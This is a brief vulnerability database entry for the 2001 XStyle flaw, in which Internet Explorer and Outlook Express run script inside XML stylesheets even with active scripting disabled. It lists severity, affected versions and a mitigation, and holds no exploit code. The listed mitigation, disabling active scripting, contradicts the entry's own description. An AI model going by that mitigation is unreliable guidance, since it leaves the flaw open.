vendor: Internet Explorer and Outlook Express
by: Georgi Guninski
CVSS: 7.5 HIGH
XML Stylesheet Injection
CWE: 79
Product Name: Internet Explorer and Outlook Express
Affected Version From: Internet Explorer 5.0
Affected Version To: Outlook Express 5.5
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:internet_explorer
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2001
XStyle Vulnerability
A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. Even when active scripting is disabled in all security zones, IE and OE still allow script to run if it is contained in the stylesheet of an XML page.
Mitigation:
Disable active scripting in all security zones.